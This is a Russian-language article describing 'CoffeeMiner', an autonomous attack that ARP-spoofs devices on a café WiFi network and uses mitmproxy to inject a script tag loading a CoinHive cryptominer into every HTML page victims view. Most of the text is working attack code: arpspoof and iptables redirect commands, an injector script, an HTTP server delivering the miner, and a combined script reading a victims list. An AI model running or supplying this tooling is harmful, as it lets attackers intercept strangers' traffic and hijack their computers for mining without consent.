Несколько недель назад я прочитал об этом случае Starbucks, где хакеры взламывали ноутбуки в сети WiFi, чтобы майнить на них криптовалюту. И я подумал, что может быть интересно провести атаку иным способом.
Цель этой статьи — объяснить, как провести атаку MITM (человек посередине) для внедрения определённого JavaScript-кода в страницы HTML, чтобы заставить все устройства, подключённые к WiFi, майнить криптовалюту для злоумышленника.
Задача состоит в создании скрипта, который проводит автономную атаку в сети WiFi. Это то, что мы назвали CoffeeMiner, поскольку атаки такого типа можно проводить в кафе.
VirtualBox.
Первым делом нужно скачать какой-нибудь дисковый образ Linux и установить его на машине VirtualBox. В данном примере будем использовать образы Kali Linux.
После скачивания ISO-образа готовим три машины VBox с установленным образом Linux.
Для конфигурации описанного сценария нужно подготовить машины, выполняющие следующие роли:
- ЖертваМашина, которая подключается к маршрутизатору и просматривает веб-страницы.
- ЗлоумышленникМашина, где запускается CoffeeMiner и осуществляется MITM-атака.
- Маршрутизатор / шлюзРаботает как нормальный шлюз.
При выполнении атаки ситуация будет такой:
Для каждой машины используем следующую конфигурацию:
- Жертвасетевой адаптер:eth0: Host-only Adapter
- /etc/network/interfaces:
- auto lo
- iface lo inet loopback
- auto eth0
- iface eth0 inet static
- address 10.0.2.10
- netmask 255.255.255.0
- gateway 10.0.2.15
- Злоумышленниксетевой адаптер:eth0: Host-only Adapter
- /etc/network/interfaces:
- auto lo
- iface lo inet loopback
- auto eth0
- iface eth0 inet static
- address 10.0.2.20
- netmask 255.255.255.0
- gateway 10.0.2.15
- Маршрутизатор / шлюзсетевой адаптер:eth0: Bridged Adapter
- eth1: Host-only Adapter
- /etc/network/interfaces:
- auto lo
- iface lo inet loopback
- auto eth0
- iface eth0 inet dhcp
- auto eth1
- iface eth1 inet static
- address 10.0.2.15
- netmask 255.255.255.0
2. CoffeeMiner, разбор кода
2.1. ARP-spoofing
Первым делом нужно понять, как осуществляется MITM-атака.
https://en.wikipedia.org/wiki/ARP_spoofing:
«В компьютерных сетях ARP-spoofing (ARP cache poisoning или ARP poison routing) — это техника, когда злоумышленник отправляет в локальную сеть (поддельные) сообщения по протоколу Address Resolution Protocol (ARP). В общем, цель состоит в связывании MAC-адреса злоумышленника с IP-адресом другого хоста, такого как шлюз по умолчанию, так что любой трафик для данного IP-адреса будет вместо этого направлен злоумышленнику».
Нажмите, чтобы раскрыть...
Для осуществления атаки ARP-spoofing будем использовать библиотеку dsniff.
Код:
Код:
arpspoof -i interface -t ipVictim ipGateway
arpspoof -i interface -t ipGateway ipVictim
2.2. mitmproxy
https://mitmproxy.org/ — это программа для анализа и редактирования трафика, который проходит через хост. Мы будем использовать её для внедрения JavaScript на страницы HTML.
Для простоты процесса внедряем одну строку кода на HTML-страницы. Эта строка кода запускает криптомайнер:
Код:
Код:
<script src="http://httpserverIP:8000/script.js"></script>
2.3. Внедрение
Когда мы перехватили трафик жертвы, то можно внедрить в него наш скрипт. Для внедрения используем mitmproxy API:
Код:
Код:
from bs4 import BeautifulSoup
from mitmproxy import ctx, http
import argparse
class Injector:
def __init__(self, path):
self.path = path
def response(self, flow: http.HTTPFlow) -> None:
if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
script = html.new_tag(
"script",
src=self.path,
type='application/javascript')
html.body.insert(0, script)
flow.response.content = str(html).encode("utf8")
print("Script injected.")
def start():
parser = argparse.ArgumentParser()
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)
2.4. HTTP-сервер
Как мы видели, инъектор добавляет в HTML-страницы одну строчку, с вызовом нашего криптомайнера на JavaScript. Так что нужно разместить файл скрипта на HTTP-сервере.
Чтобы выдать скрипт криптомайнера, запустим HTTP-сервер на машине злоумышленника. Для этого используем питоновскую библиотеку ‘http.server’:
Код:
Код:
#!/usr/bin/env python
import http.server
import socketserver
import os
PORT = 8000
web_dir = os.path.join(os.path.dirname(__file__), 'miner_script')
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
Вышеприведённый код — это простой HTTP-сервер, который отправляем жертвам наш криптомайнер, когда те его запрашивают.
Майнер на JavaScript будет размещён в директории /miner_script. В нашем случае используется JavaScript-майнер https://coinhive.com/.
2.5. Криптомайнер CoinHive
https://coinhive.com/ — это JavaScript-майнер для криптовалюты https://coinmarketcap.com/es/currencies/monero/ (XMR). Его можно добавить на сайт и использовать вычислительные ресурсы CPU на компьютерах пользователей для вычисления хэшей по алгоритму Cryptonight PoW, с помощью которых майнится Monero по протоколу https://cryptonote.org/.
Использовать майнер CoinHive имеет смысл, если пользователь остаётся на веб-странице относительно продолжительное время. Так что, например, для сайта со средними сессиями по 40 секунд он не имеет особого смысла.
Поскольку мы внедряем майнер абсолютно на все страницы, то майнер будет работать на компьютерах жертв продолжительное время.
3. CoffeeMiner, интеграция всего вместе
Основная задача — связать все описанные концепции в одну автономную установку. Это и будет CoffeeMiner.
Смысл в том, чтобы один скрипт CoffeeMiner осуществлял атаку ARP-spoofing и устанавливал mitmproxy для внедрения криптомайнера CoinHive в HTML-страницы жертв.
Сначала нужно сконфигурировать ip_forwarding и IPTABLES, чтобы машина злоумышленника работала как прокси:
Код:
Код:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Для проведения атаки ARP-spoofing для всех жертв подготавливаем файл ‘victims.txt’ с IP-адресами всех жертв. Считываем эти адреса несколькими строчками на Python (а также IP-адрес шлюза) — и проводим атаку ARP-spoofing для каждого IP-адреса жертвы.
Код:
Код:
# get gateway_ip
gateway = sys.argv[1]
print("gateway: " + gateway)
# get victims_ip
victims = [line.rstrip('\n') for line in open("victims.txt")]
print("victims:")
print(victims)
# run the arpspoof for each victim, each one in a new console
for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
После этого осталось запустить HTTP-сервер:
Код:
Код:
> python3 httpServer.py
И теперь можно запускать mitmproxy через injector.py:
Код:
Код:
> mitmdump -s 'injector.py http://httpserverIP:8000/script.js'
3.1. CoffeeMiner, окончательный скрипт
Теперь мы объединили все вышеописанные концепции в единый скрипт coffeeMiner.py:
Код:
Код:
import os
import sys
#get gateway_ip (router)
gateway = sys.argv[1]
print("gateway: " + gateway)
# get victims_ip
victims = [line.rstrip('\n') for line in open("victims.txt")]
print("victims:")
print(victims)
# configure routing (IPTABLES)
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")
# run the arpspoof for each victim, each one in a new console
for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
# start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python3 httpServer.py' &")
# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
А также скрипт injector.py:
Код:
Код:
from bs4 import BeautifulSoup
from mitmproxy import ctx, http
import argparse
class Injector:
def __init__(self, path):
self.path = path
def response(self, flow: http.HTTPFlow) -> None:
if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
print(flow.response.headers["content-type"])
script = html.new_tag(
"script",
src=self.path,
type='application/javascript')
html.body.insert(0, script)
flow.response.content = str(html).encode("utf8")
print("Script injected.")
def start():
parser = argparse.ArgumentParser()
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)
И для начала атаки достаточно всего лишь запустить следующую команду:
Код:
> python3 coffeeMiner.py RouterIP